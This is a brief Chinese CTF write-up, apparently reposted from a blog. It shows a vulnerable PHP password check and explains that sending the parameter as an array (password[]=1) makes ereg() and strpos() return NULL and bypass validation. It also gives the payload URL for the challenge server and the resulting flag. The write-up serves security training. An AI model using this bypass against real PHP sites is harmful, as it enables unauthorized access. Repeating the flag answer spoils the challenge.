<?
php
$flag = "flag"
;
if (
isset (
$_GET['password'
])) {
if (
ereg ("^[a-zA-Z0-9]+$",
$_GET['password']) ===
FALSE)
echo 'You password must be alphanumeric'
;
else if (
strpos (
$_GET['password'], '--') !==
FALSE)
die('Flag: ' .
$flag);
else
echo 'Invalid password'
;
}
?>
ereg可以用�来进行截断
strpos用数组进行截断,返回null
payload
http:
//123.206.87.240:9009/19.php?password[]=1
PHP是弱语言,对数组比较敏感
Flag: flag{ctf-bugku-ad-2131212}
转载于:https://www.cnblogs.com/gaonuoqi/p/11407089.html
